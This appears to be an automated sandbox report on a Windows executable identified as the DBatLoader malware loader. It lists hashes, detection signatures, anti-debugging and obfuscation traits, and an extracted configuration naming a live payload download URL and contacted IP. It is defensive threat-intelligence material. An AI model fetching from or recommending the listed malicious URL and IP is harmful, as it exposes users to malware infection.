Edit tour

Windows Analysis Report
6BE4RDldhw.exe

Overview

General Information

Sample name:	6BE4RDldhw.exe renamed because original name is a hash value
Original sample name:	04ea25c19c4f9bc7788cc78115386f2a8c0647bc23980cd57d8376fc0d1e7820.exe
Analysis ID:	1562862
MD5:	1a6538c76ae6ea94e5a6976adf7dbd67
SHA1:	f31c769d58680d42e5c34a8119bf855fc4920060
SHA256:	04ea25c19c4f9bc7788cc78115386f2a8c0647bc23980cd57d8376fc0d1e7820
Tags:	doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected DBatLoader

AI detected suspicious sample

Allocates many large memory junks

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Machine Learning detection for sample

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

6BE4RDldhw.exe (PID: 7796 cmdline: "C:\Users\user\Desktop\6BE4RDldhw.exe" MD5: 1A6538C76AE6EA94E5A6976ADF7DBD67)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: 6BE4RDldhw.exe PID: 7796	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.6BE4RDldhw.exe.2e70000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T08:12:11.473687+0100	2028371	3	Unknown Traffic	192.168.2.7	49702	108.170.55.202	443	TCP
2024-11-26T08:12:13.402767+0100	2028371	3	Unknown Traffic	192.168.2.7	49708	108.170.55.202	443	TCP
2024-11-26T08:12:15.703179+0100	2028371	3	Unknown Traffic	192.168.2.7	49715	108.170.55.202	443	TCP
2024-11-26T08:12:17.524193+0100	2028371	3	Unknown Traffic	192.168.2.7	49721	108.170.55.202	443	TCP
2024-11-26T08:12:19.920234+0100	2028371	3	Unknown Traffic	192.168.2.7	49728	108.170.55.202	443	TCP
2024-11-26T08:12:21.806763+0100	2028371	3	Unknown Traffic	192.168.2.7	49729	108.170.55.202	443	TCP
2024-11-26T08:12:24.073316+0100	2028371	3	Unknown Traffic	192.168.2.7	49737	108.170.55.202	443	TCP
2024-11-26T08:12:25.967840+0100	2028371	3	Unknown Traffic	192.168.2.7	49744	108.170.55.202	443	TCP
2024-11-26T08:12:28.320613+0100	2028371	3	Unknown Traffic	192.168.2.7	49752	108.170.55.202	443	TCP
2024-11-26T08:12:30.481324+0100	2028371	3	Unknown Traffic	192.168.2.7	49760	108.170.55.202	443	TCP
2024-11-26T08:12:32.876400+0100	2028371	3	Unknown Traffic	192.168.2.7	49767	108.170.55.202	443	TCP
2024-11-26T08:12:34.802777+0100	2028371	3	Unknown Traffic	192.168.2.7	49773	108.170.55.202	443	TCP
2024-11-26T08:12:37.141813+0100	2028371	3	Unknown Traffic	192.168.2.7	49780	108.170.55.202	443	TCP
2024-11-26T08:12:39.020661+0100	2028371	3	Unknown Traffic	192.168.2.7	49786	108.170.55.202	443	TCP
2024-11-26T08:12:41.309552+0100	2028371	3	Unknown Traffic	192.168.2.7	49793	108.170.55.202	443	TCP
2024-11-26T08:12:43.143202+0100	2028371	3	Unknown Traffic	192.168.2.7	49799	108.170.55.202	443	TCP
2024-11-26T08:12:45.806689+0100	2028371	3	Unknown Traffic	192.168.2.7	49806	108.170.55.202	443	TCP
2024-11-26T08:12:47.762699+0100	2028371	3	Unknown Traffic	192.168.2.7	49812	108.170.55.202	443	TCP
2024-11-26T08:12:50.115790+0100	2028371	3	Unknown Traffic	192.168.2.7	49819	108.170.55.202	443	TCP
2024-11-26T08:12:52.206224+0100	2028371	3	Unknown Traffic	192.168.2.7	49825	108.170.55.202	443	TCP
2024-11-26T08:12:54.864294+0100	2028371	3	Unknown Traffic	192.168.2.7	49832	108.170.55.202	443	TCP
2024-11-26T08:12:56.779735+0100	2028371	3	Unknown Traffic	192.168.2.7	49838	108.170.55.202	443	TCP
2024-11-26T08:12:59.051286+0100	2028371	3	Unknown Traffic	192.168.2.7	49845	108.170.55.202	443	TCP
2024-11-26T08:13:00.973326+0100	2028371	3	Unknown Traffic	192.168.2.7	49850	108.170.55.202	443	TCP
2024-11-26T08:13:03.808752+0100	2028371	3	Unknown Traffic	192.168.2.7	49858	108.170.55.202	443	TCP
2024-11-26T08:13:05.681335+0100	2028371	3	Unknown Traffic	192.168.2.7	49862	108.170.55.202	443	TCP
2024-11-26T08:13:07.999771+0100	2028371	3	Unknown Traffic	192.168.2.7	49870	108.170.55.202	443	TCP
2024-11-26T08:13:10.086389+0100	2028371	3	Unknown Traffic	192.168.2.7	49876	108.170.55.202	443	TCP
2024-11-26T08:13:12.514726+0100	2028371	3	Unknown Traffic	192.168.2.7	49883	108.170.55.202	443	TCP
2024-11-26T08:13:14.409317+0100	2028371	3	Unknown Traffic	192.168.2.7	49889	108.170.55.202	443	TCP
2024-11-26T08:13:16.873080+0100	2028371	3	Unknown Traffic	192.168.2.7	49896	108.170.55.202	443	TCP
2024-11-26T08:13:18.757808+0100	2028371	3	Unknown Traffic	192.168.2.7	49901	108.170.55.202	443	TCP
2024-11-26T08:13:21.057191+0100	2028371	3	Unknown Traffic	192.168.2.7	49908	108.170.55.202	443	TCP
2024-11-26T08:13:22.981249+0100	2028371	3	Unknown Traffic	192.168.2.7	49912	108.170.55.202	443	TCP
2024-11-26T08:13:25.303120+0100	2028371	3	Unknown Traffic	192.168.2.7	49919	108.170.55.202	443	TCP
2024-11-26T08:13:27.176743+0100	2028371	3	Unknown Traffic	192.168.2.7	49925	108.170.55.202	443	TCP
2024-11-26T08:13:29.476379+0100	2028371	3	Unknown Traffic	192.168.2.7	49931	108.170.55.202	443	TCP
2024-11-26T08:13:31.616873+0100	2028371	3	Unknown Traffic	192.168.2.7	49936	108.170.55.202	443	TCP
2024-11-26T08:13:34.158592+0100	2028371	3	Unknown Traffic	192.168.2.7	49943	108.170.55.202	443	TCP
2024-11-26T08:13:36.181653+0100	2028371	3	Unknown Traffic	192.168.2.7	49949	108.170.55.202	443	TCP
2024-11-26T08:13:38.479015+0100	2028371	3	Unknown Traffic	192.168.2.7	49956	108.170.55.202	443	TCP
2024-11-26T08:13:40.317916+0100	2028371	3	Unknown Traffic	192.168.2.7	49962	108.170.55.202	443	TCP
2024-11-26T08:13:42.565359+0100	2028371	3	Unknown Traffic	192.168.2.7	49969	108.170.55.202	443	TCP
2024-11-26T08:13:44.398469+0100	2028371	3	Unknown Traffic	192.168.2.7	49975	108.170.55.202	443	TCP
2024-11-26T08:13:46.690752+0100	2028371	3	Unknown Traffic	192.168.2.7	49982	108.170.55.202	443	TCP
2024-11-26T08:13:48.528390+0100	2028371	3	Unknown Traffic	192.168.2.7	49987	108.170.55.202	443	TCP
2024-11-26T08:13:50.843723+0100	2028371	3	Unknown Traffic	192.168.2.7	49994	108.170.55.202	443	TCP
2024-11-26T08:13:52.816807+0100	2028371	3	Unknown Traffic	192.168.2.7	49998	108.170.55.202	443	TCP
2024-11-26T08:13:55.446370+0100	2028371	3	Unknown Traffic	192.168.2.7	50007	108.170.55.202	443	TCP
2024-11-26T08:13:57.332730+0100	2028371	3	Unknown Traffic	192.168.2.7	50012	108.170.55.202	443	TCP
2024-11-26T08:13:59.711182+0100	2028371	3	Unknown Traffic	192.168.2.7	50019	108.170.55.202	443	TCP
2024-11-26T08:14:01.552217+0100	2028371	3	Unknown Traffic	192.168.2.7	50024	108.170.55.202	443	TCP
2024-11-26T08:14:03.797752+0100	2028371	3	Unknown Traffic	192.168.2.7	50031	108.170.55.202	443	TCP
2024-11-26T08:14:05.871190+0100	2028371	3	Unknown Traffic	192.168.2.7	50033	108.170.55.202	443	TCP
2024-11-26T08:14:08.509134+0100	2028371	3	Unknown Traffic	192.168.2.7	50042	108.170.55.202	443	TCP
2024-11-26T08:14:10.501709+0100	2028371	3	Unknown Traffic	192.168.2.7	50046	108.170.55.202	443	TCP
2024-11-26T08:14:13.037106+0100	2028371	3	Unknown Traffic	192.168.2.7	50052	108.170.55.202	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 6BE4RDldhw.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi:	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi8	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaIb	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/05	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiDASYC	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_YjnxmyasmzaX	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiqr	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/9r6k	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLas	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/H	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/234567876543212P	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/2345678765432121$	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza0u	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzaaq	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/yr	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza0u	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/1r	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzakb	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzaqb	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/)r	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgim	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzak	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgig3ok	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza	Avira URL Cloud: Label: malware
Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi$	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-s	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/Qu	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/Qr	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi1Content-LengthAllowWarningViaUpgradeTransfer-	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/Ir	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-R	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/Ar	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi)r	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaCb	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza8	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza7	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/234567876543212a	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza-bRk	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzakb	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/4	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi4	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiP	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/iu	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiU3	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/234567876543212	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi$	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaWb	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza$	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in	Avira URL Cloud: Label: phishing
Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza#	Avira URL Cloud: Label: malware

Found malware configuration

Source: 6BE4RDldhw.exe

Malware Configuration Extractor: DBatLoader {"Download Url": ["https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza"]}

Multi AV Scanner detection for domain / URL

Source: taksonsdfg.co.in

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for submitted file

Source: 6BE4RDldhw.exe	ReversingLabs: Detection: 65%
Source: 6BE4RDldhw.exe	Virustotal: Detection: 67%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: 6BE4RDldhw.exe

Joe Sandbox ML: detected

Source: 6BE4RDldhw.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49931 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49943 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50042 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50052 version: TLS 1.2

Source:	Binary string: easinvoker.pdb source: 6BE4RDldhw.exe, 6BE4RDldhw.exe, 00000000.00000003.1333153403.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2582071460.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: 6BE4RDldhw.exe, 00000000.00000003.1333153403.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333431137.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2582071460.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2583380707.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E75908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02E75908

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza

Source: C:\Users\user\Desktop\6BE4RDldhw.exe

Code function: 0_2_02E8E4B4 InternetCheckConnectionA,

0_2_02E8E4B4

Source: Joe Sandbox View

IP Address: 108.170.55.202 108.170.55.202

Source: Joe Sandbox View

ASN Name: SSASN2US SSASN2US

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49708 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49737 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49728 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49767 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49744 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49773 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49752 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49721 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49760 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49729 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49786 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49799 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49780 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49793 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49806 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49812 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49819 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49825 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49832 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49838 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49850 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49858 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49870 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49876 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49862 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49845 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49889 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49883 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49896 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49901 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49912 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49908 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49925 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49931 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49936 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49919 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49943 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49949 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49962 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49956 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49969 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49975 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49982 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49987 -> 108.170.55.202:443
